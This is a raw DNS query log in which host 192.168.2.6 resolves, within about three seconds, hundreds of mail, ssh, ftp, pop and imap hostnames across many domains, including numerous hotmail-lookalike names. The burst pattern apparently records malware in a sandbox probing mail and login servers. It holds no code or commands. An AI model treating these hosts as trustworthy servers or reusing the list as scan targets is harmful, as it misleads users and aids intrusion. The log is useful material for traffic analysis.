Feb 21, 2024 00:26:10.172316074 CET	192.168.2.6	1.1.1.1	0xf793	Standard query (0)	mail.radiussystemllc.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.233330011 CET	192.168.2.6	1.1.1.1	0xb00c	Standard query (0)	mail.att.no	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.234149933 CET	192.168.2.6	1.1.1.1	0x2326	Standard query (0)	mail.jtirit.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.234927893 CET	192.168.2.6	1.1.1.1	0x2a67	Standard query (0)	mail.hotmail.fryahoo.fr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.234927893 CET	192.168.2.6	1.1.1.1	0x56a	Standard query (0)	mail.hotmailhome.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.333190918 CET	192.168.2.6	1.1.1.1	0xa2e8	Standard query (0)	imap.jalds.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.334749937 CET	192.168.2.6	1.1.1.1	0x94cf	Standard query (0)	mail.dancenight-express.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.335619926 CET	192.168.2.6	1.1.1.1	0xac3c	Standard query (0)	sell.sawbrokers.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.336999893 CET	192.168.2.6	1.1.1.1	0x8a22	Standard query (0)	mail.hotmail.fr.br	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.385271072 CET	192.168.2.6	1.1.1.1	0x5802	Standard query (0)	mail.homehotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.386077881 CET	192.168.2.6	1.1.1.1	0x7d38	Standard query (0)	mail.esafrica.co.zw	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.387398005 CET	192.168.2.6	1.1.1.1	0xfcfa	Standard query (0)	mail.hotmail-topmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.471788883 CET	192.168.2.6	1.1.1.1	0x753	Standard query (0)	ftp.cdgcapitalbourse.ma	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.472444057 CET	192.168.2.6	1.1.1.1	0x38c	Standard query (0)	ssh.schupp-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.474381924 CET	192.168.2.6	1.1.1.1	0xac8c	Standard query (0)	ftp.runyai-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.485296011 CET	192.168.2.6	1.1.1.1	0x9b15	Standard query (0)	ssh.smhotmaillang.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.485424995 CET	192.168.2.6	1.1.1.1	0xff9e	Standard query (0)	ssh.fos-elektronik.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.490849018 CET	192.168.2.6	1.1.1.1	0x899	Standard query (0)	ssh.newhotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.490849018 CET	192.168.2.6	1.1.1.1	0x2a8d	Standard query (0)	ssh.heinzerlinghotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.541758060 CET	192.168.2.6	1.1.1.1	0x518a	Standard query (0)	ssh.hotmailhome.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.542002916 CET	192.168.2.6	1.1.1.1	0x1465	Standard query (0)	ssh.imao.ml	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.542434931 CET	192.168.2.6	1.1.1.1	0xab34	Standard query (0)	mail.farma-aps.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.542435884 CET	192.168.2.6	1.1.1.1	0x7b14	Standard query (0)	ssh.architettosangiorgio.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.544790983 CET	192.168.2.6	1.1.1.1	0x2442	Standard query (0)	ssh.esafrica.co.zw	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.632724047 CET	192.168.2.6	1.1.1.1	0xccd0	Standard query (0)	mail.imao.ml	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.771302938 CET	192.168.2.6	1.1.1.1	0x7b3d	Standard query (0)	relay.m-viper.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.771733999 CET	192.168.2.6	1.1.1.1	0xfdd2	Standard query (0)	ssh.gamma.ocm.ne.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.772124052 CET	192.168.2.6	1.1.1.1	0x23ae	Standard query (0)	ssh.tux4hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.772284985 CET	192.168.2.6	1.1.1.1	0xcbd7	Standard query (0)	ssh.lavera2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.774280071 CET	192.168.2.6	1.1.1.1	0xc826	Standard query (0)	ftp.hotmail.fr.ar	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.774280071 CET	192.168.2.6	1.1.1.1	0x4af5	Standard query (0)	ftp.farma-aps.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.774519920 CET	192.168.2.6	1.1.1.1	0x7316	Standard query (0)	mail.newhotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.775823116 CET	192.168.2.6	1.1.1.1	0x34b5	Standard query (0)	mail.smhotmaillang.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.775823116 CET	192.168.2.6	1.1.1.1	0xe3c0	Standard query (0)	ssh.sq-community.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.776015043 CET	192.168.2.6	1.1.1.1	0xc9a9	Standard query (0)	ssh.x-erfolgsteam.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.776252985 CET	192.168.2.6	1.1.1.1	0x6869	Standard query (0)	ssh.jalds.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.776281118 CET	192.168.2.6	1.1.1.1	0x3b5	Standard query (0)	mail.kvapilova.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.776562929 CET	192.168.2.6	1.1.1.1	0x3532	Standard query (0)	ssh.terminatour-bohotmailing.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.776906967 CET	192.168.2.6	1.1.1.1	0x2af8	Standard query (0)	ssh.aregods.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.777147055 CET	192.168.2.6	1.1.1.1	0x8f0	Standard query (0)	ssh.dancenight-express.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.777734995 CET	192.168.2.6	1.1.1.1	0xf61d	Standard query (0)	mail.hotmailjoy.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.777880907 CET	192.168.2.6	1.1.1.1	0x2e23	Standard query (0)	mail.spd-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.781105995 CET	192.168.2.6	1.1.1.1	0x111	Standard query (0)	ftp.undercover-bietigheim.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.781292915 CET	192.168.2.6	1.1.1.1	0xe718	Standard query (0)	mail.x-erfolgsteam.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.784055948 CET	192.168.2.6	1.1.1.1	0x9c21	Standard query (0)	mail.igs-ruelzheim.rp.lo-net2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.785922050 CET	192.168.2.6	1.1.1.1	0xcfd5	Standard query (0)	mail.hotmail.fr.ar	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.787492990 CET	192.168.2.6	1.1.1.1	0x4e3d	Standard query (0)	ssh.runyai-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.788291931 CET	192.168.2.6	1.1.1.1	0xd46b	Standard query (0)	ssh.att.no	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.868132114 CET	192.168.2.6	1.1.1.1	0xc2f9	Standard query (0)	ssh.29hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.868132114 CET	192.168.2.6	1.1.1.1	0xec34	Standard query (0)	ssh.hotmail-topmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.869971037 CET	192.168.2.6	1.1.1.1	0x3c8d	Standard query (0)	ssh.ufer-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.871952057 CET	192.168.2.6	1.1.1.1	0xb2e8	Standard query (0)	www.ovh.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.873564959 CET	192.168.2.6	1.1.1.1	0xc8a4	Standard query (0)	ssh.temxp.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.873564959 CET	192.168.2.6	1.1.1.1	0xbea9	Standard query (0)	ssh.zube-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.878731012 CET	192.168.2.6	1.1.1.1	0x9c08	Standard query (0)	ssh.generika-apotheke-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.880080938 CET	192.168.2.6	1.1.1.1	0x2cc8	Standard query (0)	ftp.outlook.fr.sg	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.883498907 CET	192.168.2.6	1.1.1.1	0xf8ff	Standard query (0)	ssh.hotmail.fr.br	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.946023941 CET	192.168.2.6	1.1.1.1	0x246	Standard query (0)	ssh.morr-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:10.947745085 CET	192.168.2.6	1.1.1.1	0xa132	Standard query (0)	ssh.jtirit.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.095226049 CET	192.168.2.6	1.1.1.1	0x1447	Standard query (0)	ssh.cdgcapitalbourse.ma	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.096879959 CET	192.168.2.6	1.1.1.1	0x799a	Standard query (0)	ssh.hotmail.fr.tr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.097794056 CET	192.168.2.6	1.1.1.1	0xf146	Standard query (0)	ssh.att.in	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.099704027 CET	192.168.2.6	1.1.1.1	0x3e6c	Standard query (0)	ssh.utlohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.099704027 CET	192.168.2.6	1.1.1.1	0x8dd3	Standard query (0)	ssh.kvapilova.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.201932907 CET	192.168.2.6	1.1.1.1	0x23b8	Standard query (0)	ssh.hotmail.demail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.207211971 CET	192.168.2.6	1.1.1.1	0x9b4	Standard query (0)	mail.oulohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.208739996 CET	192.168.2.6	1.1.1.1	0xf19b	Standard query (0)	ssh.farma-aps.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.211239100 CET	192.168.2.6	1.1.1.1	0xfee1	Standard query (0)	ssh.rubypink.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.212662935 CET	192.168.2.6	1.1.1.1	0x1950	Standard query (0)	mail.ufer-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.217988014 CET	192.168.2.6	1.1.1.1	0x9160	Standard query (0)	ssh.spd-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.222553015 CET	192.168.2.6	1.1.1.1	0xef70	Standard query (0)	ssh.oulohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.223753929 CET	192.168.2.6	1.1.1.1	0x572a	Standard query (0)	ssh.homehotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.223753929 CET	192.168.2.6	1.1.1.1	0xfaa	Standard query (0)	ssh.hotmail.fryahoo.fr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.224098921 CET	192.168.2.6	1.1.1.1	0x1376	Standard query (0)	ssh.gothic-concerts.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.226634026 CET	192.168.2.6	1.1.1.1	0x715d	Standard query (0)	ssh.undercover-bietigheim.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.227319956 CET	192.168.2.6	1.1.1.1	0x35d	Standard query (0)	ssh.radiussystemllc.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.227885008 CET	192.168.2.6	1.1.1.1	0xd97b	Standard query (0)	ssh.igs-ruelzheim.rp.lo-net2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.227885008 CET	192.168.2.6	1.1.1.1	0xfc75	Standard query (0)	mail.att.in	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.230483055 CET	192.168.2.6	1.1.1.1	0x21f1	Standard query (0)	ssh.hoenighotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.231520891 CET	192.168.2.6	1.1.1.1	0xf5e2	Standard query (0)	ssh.ptotonmail.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.395426035 CET	192.168.2.6	1.1.1.1	0xa2e8	Standard query (0)	imap.jalds.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.403211117 CET	192.168.2.6	1.1.1.1	0xf4e0	Standard query (0)	mail.outlook.fr.sg	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.404396057 CET	192.168.2.6	1.1.1.1	0x222a	Standard query (0)	ssh.scw-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.406207085 CET	192.168.2.6	1.1.1.1	0x25b7	Standard query (0)	caspianseagulltravels.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.464261055 CET	192.168.2.6	1.1.1.1	0x1dc2	Standard query (0)	ssh.hotmailjoy.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.571906090 CET	192.168.2.6	1.1.1.1	0x9872	Standard query (0)	mail.sq-community.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.735125065 CET	192.168.2.6	1.1.1.1	0x6bbe	Standard query (0)	pop.generika-apotheke-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.736058950 CET	192.168.2.6	1.1.1.1	0xc6a3	Standard query (0)	pop.scw-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.816014051 CET	192.168.2.6	1.1.1.1	0x41b3	Standard query (0)	mail.gothic-concerts.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.818448067 CET	192.168.2.6	1.1.1.1	0xba90	Standard query (0)	ww1.imailzone.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.868299007 CET	192.168.2.6	1.1.1.1	0xbb04	Standard query (0)	att.co.id	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.874424934 CET	192.168.2.6	1.1.1.1	0x9117	Standard query (0)	ssh.hotmail.fr.ar	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:11.875312090 CET	192.168.2.6	1.1.1.1	0xd6b2	Standard query (0)	mail.fos-elektronik.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.042253017 CET	192.168.2.6	1.1.1.1	0x6a25	Standard query (0)	ssh.outlook.fr.sg	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.113941908 CET	192.168.2.6	1.1.1.1	0x6dfa	Standard query (0)	pop.gamma.ocm.ne.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.115850925 CET	192.168.2.6	1.1.1.1	0x12c2	Standard query (0)	pop.schupp-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.115850925 CET	192.168.2.6	1.1.1.1	0xbcb7	Standard query (0)	pop.hotmail.demail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.120048046 CET	192.168.2.6	1.1.1.1	0x2dc9	Standard query (0)	pop.lavera2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.187510967 CET	192.168.2.6	1.1.1.1	0x7e3e	Standard query (0)	pop.runyai-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.200328112 CET	192.168.2.6	1.1.1.1	0xaf52	Standard query (0)	shinko-kensetsu.eei.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.307740927 CET	192.168.2.6	1.1.1.1	0xaec7	Standard query (0)	pop.hotmail.fr.br	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.308291912 CET	192.168.2.6	1.1.1.1	0xfde9	Standard query (0)	pop.hotmail-topmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.308492899 CET	192.168.2.6	1.1.1.1	0x6bac	Standard query (0)	www.publichouse.ie	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.423497915 CET	192.168.2.6	1.1.1.1	0xf4e0	Standard query (0)	mail.outlook.fr.sg	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.427766085 CET	192.168.2.6	1.1.1.1	0xb011	Standard query (0)	pop.morr-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.436275005 CET	192.168.2.6	1.1.1.1	0x4be2	Standard query (0)	pop.att.no	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.437236071 CET	192.168.2.6	1.1.1.1	0x46b1	Standard query (0)	pop.radiussystemllc.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.437844992 CET	192.168.2.6	1.1.1.1	0x166b	Standard query (0)	pop.utlohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.441293955 CET	192.168.2.6	1.1.1.1	0x3a0d	Standard query (0)	pop.hotmail.fr.tr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.442291021 CET	192.168.2.6	1.1.1.1	0xb01d	Standard query (0)	pop.undercover-bietigheim.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.453932047 CET	192.168.2.6	1.1.1.1	0x60e1	Standard query (0)	pop.heinzerlinghotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.532170057 CET	192.168.2.6	1.1.1.1	0x3e29	Standard query (0)	pop.hotmailhome.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.532643080 CET	192.168.2.6	1.1.1.1	0x3276	Standard query (0)	pop.terminatour-bohotmailing.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.598824978 CET	192.168.2.6	1.1.1.1	0x198b	Standard query (0)	pop.ptotonmail.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.599173069 CET	192.168.2.6	1.1.1.1	0x74b	Standard query (0)	pop.rubypink.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.602018118 CET	192.168.2.6	1.1.1.1	0xd84c	Standard query (0)	mailgate.jalds.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.605794907 CET	192.168.2.6	1.1.1.1	0x7bfd	Standard query (0)	pop.hotmail.fryahoo.fr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.605794907 CET	192.168.2.6	1.1.1.1	0x316d	Standard query (0)	pop.jtirit.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.609127045 CET	192.168.2.6	1.1.1.1	0x7a3f	Standard query (0)	pop.zube-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.652050018 CET	192.168.2.6	1.1.1.1	0x45a7	Standard query (0)	pop.dancenight-express.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.669245958 CET	192.168.2.6	1.1.1.1	0x605a	Standard query (0)	ssh.archononline.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.722642899 CET	192.168.2.6	1.1.1.1	0x97e4	Standard query (0)	pop.homehotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.722642899 CET	192.168.2.6	1.1.1.1	0xd2d5	Standard query (0)	dancenight-express.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.723189116 CET	192.168.2.6	1.1.1.1	0x9842	Standard query (0)	pop.farma-aps.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.724365950 CET	192.168.2.6	1.1.1.1	0xb18b	Standard query (0)	pop.imao.ml	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.730114937 CET	192.168.2.6	1.1.1.1	0xfad0	Standard query (0)	hotmailhome.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.731399059 CET	192.168.2.6	1.1.1.1	0x43ab	Standard query (0)	hotmail.fr.tr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.731607914 CET	192.168.2.6	1.1.1.1	0x3097	Standard query (0)	ufer-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.731708050 CET	192.168.2.6	1.1.1.1	0x9c32	Standard query (0)	oulohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.731851101 CET	192.168.2.6	1.1.1.1	0xd9ca	Standard query (0)	generika-apotheke-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.732461929 CET	192.168.2.6	1.1.1.1	0x84b4	Standard query (0)	imap.wilsonfamilyinsurance.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.732461929 CET	192.168.2.6	1.1.1.1	0xcca	Standard query (0)	morr-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.791472912 CET	192.168.2.6	1.1.1.1	0x8575	Standard query (0)	smhotmaillang.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.792582989 CET	192.168.2.6	1.1.1.1	0xc04a	Standard query (0)	pop.x-erfolgsteam.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.793073893 CET	192.168.2.6	1.1.1.1	0xcae9	Standard query (0)	heinzerlinghotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.793920994 CET	192.168.2.6	1.1.1.1	0x13f4	Standard query (0)	gothic-concerts.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.794321060 CET	192.168.2.6	1.1.1.1	0x7019	Standard query (0)	imao.ml	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.795250893 CET	192.168.2.6	1.1.1.1	0xbabb	Standard query (0)	lavera2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.796806097 CET	192.168.2.6	1.1.1.1	0xa485	Standard query (0)	pop.tux4hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.858371019 CET	192.168.2.6	1.1.1.1	0xbb04	Standard query (0)	att.co.id	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.858668089 CET	192.168.2.6	1.1.1.1	0xe88d	Standard query (0)	x-erfolgsteam.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.858800888 CET	192.168.2.6	1.1.1.1	0x1b1c	Standard query (0)	pop.smhotmaillang.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.858989000 CET	192.168.2.6	1.1.1.1	0x961d	Standard query (0)	pop.kvapilova.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.859558105 CET	192.168.2.6	1.1.1.1	0x9a71	Standard query (0)	utlohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.860488892 CET	192.168.2.6	1.1.1.1	0xc522	Standard query (0)	hotmailjoy.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.860815048 CET	192.168.2.6	1.1.1.1	0x1c45	Standard query (0)	undercover-bietigheim.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.861288071 CET	192.168.2.6	1.1.1.1	0xef7b	Standard query (0)	zube-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.862479925 CET	192.168.2.6	1.1.1.1	0x27df	Standard query (0)	jalds.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.862992048 CET	192.168.2.6	1.1.1.1	0xd3e1	Standard query (0)	att.no	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.866132021 CET	192.168.2.6	1.1.1.1	0xfa59	Standard query (0)	igs-ruelzheim.rp.lo-net2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.867156982 CET	192.168.2.6	1.1.1.1	0xd621	Standard query (0)	homehotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.867289066 CET	192.168.2.6	1.1.1.1	0xe9cb	Standard query (0)	pop.hotmailjoy.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.867415905 CET	192.168.2.6	1.1.1.1	0x309f	Standard query (0)	pop.spd-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.868143082 CET	192.168.2.6	1.1.1.1	0xad59	Standard query (0)	hotmail.fryahoo.fr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.934005976 CET	192.168.2.6	1.1.1.1	0xe718	Standard query (0)	pop.esafrica.co.zw	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.934853077 CET	192.168.2.6	1.1.1.1	0xcc26	Standard query (0)	tux4hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.935888052 CET	192.168.2.6	1.1.1.1	0xe428	Standard query (0)	hotmail-topmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.936732054 CET	192.168.2.6	1.1.1.1	0x56b	Standard query (0)	jtirit.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.936949968 CET	192.168.2.6	1.1.1.1	0x7490	Standard query (0)	newhotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.938886881 CET	192.168.2.6	1.1.1.1	0xc2a8	Standard query (0)	farma-aps.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.939503908 CET	192.168.2.6	1.1.1.1	0x39b2	Standard query (0)	terminatour-bohotmailing.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.990614891 CET	192.168.2.6	1.1.1.1	0x89c8	Standard query (0)	rubypink.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:12.995533943 CET	192.168.2.6	1.1.1.1	0xd279	Standard query (0)	imap.hotmail.fr.tr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.046885014 CET	192.168.2.6	1.1.1.1	0xa0bd	Standard query (0)	glazingbt-com01i.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.047239065 CET	192.168.2.6	1.1.1.1	0x8c54	Standard query (0)	markoren-no.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.047239065 CET	192.168.2.6	1.1.1.1	0xeae1	Standard query (0)	pop.igs-ruelzheim.rp.lo-net2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.055516958 CET	192.168.2.6	1.1.1.1	0x9dbd	Standard query (0)	hotmail.demail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.057293892 CET	192.168.2.6	1.1.1.1	0x3fa1	Standard query (0)	radiussystemllc.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.065594912 CET	192.168.2.6	1.1.1.1	0x3ec	Standard query (0)	pop3.scw-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.127598047 CET	192.168.2.6	1.1.1.1	0xf2c9	Standard query (0)	pop.ufer-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.204207897 CET	192.168.2.6	1.1.1.1	0x127f	Standard query (0)	imap.hotmail.fr.br	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.205698967 CET	192.168.2.6	1.1.1.1	0x3652	Standard query (0)	pop.oulohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.238993883 CET	192.168.2.6	1.1.1.1	0x9102	Standard query (0)	imap.esafrica.co.zw	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.238993883 CET	192.168.2.6	1.1.1.1	0xfade	Standard query (0)	pop3.runyai-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.241677046 CET	192.168.2.6	1.1.1.1	0x9bf3	Standard query (0)	pop.newhotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.245038033 CET	192.168.2.6	1.1.1.1	0x1f4e	Standard query (0)	pop.att.in	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.246467113 CET	192.168.2.6	1.1.1.1	0x7f62	Standard query (0)	pop.hotmail.fr.ar	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.249484062 CET	192.168.2.6	1.1.1.1	0xe472	Standard query (0)	pop3.generika-apotheke-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:13.250020027 CET	192.168.2.6	1.1.1.1	0xf6d5	Standard query (0)	imap.att.in	A (IP address)	IN (0x0001)	false
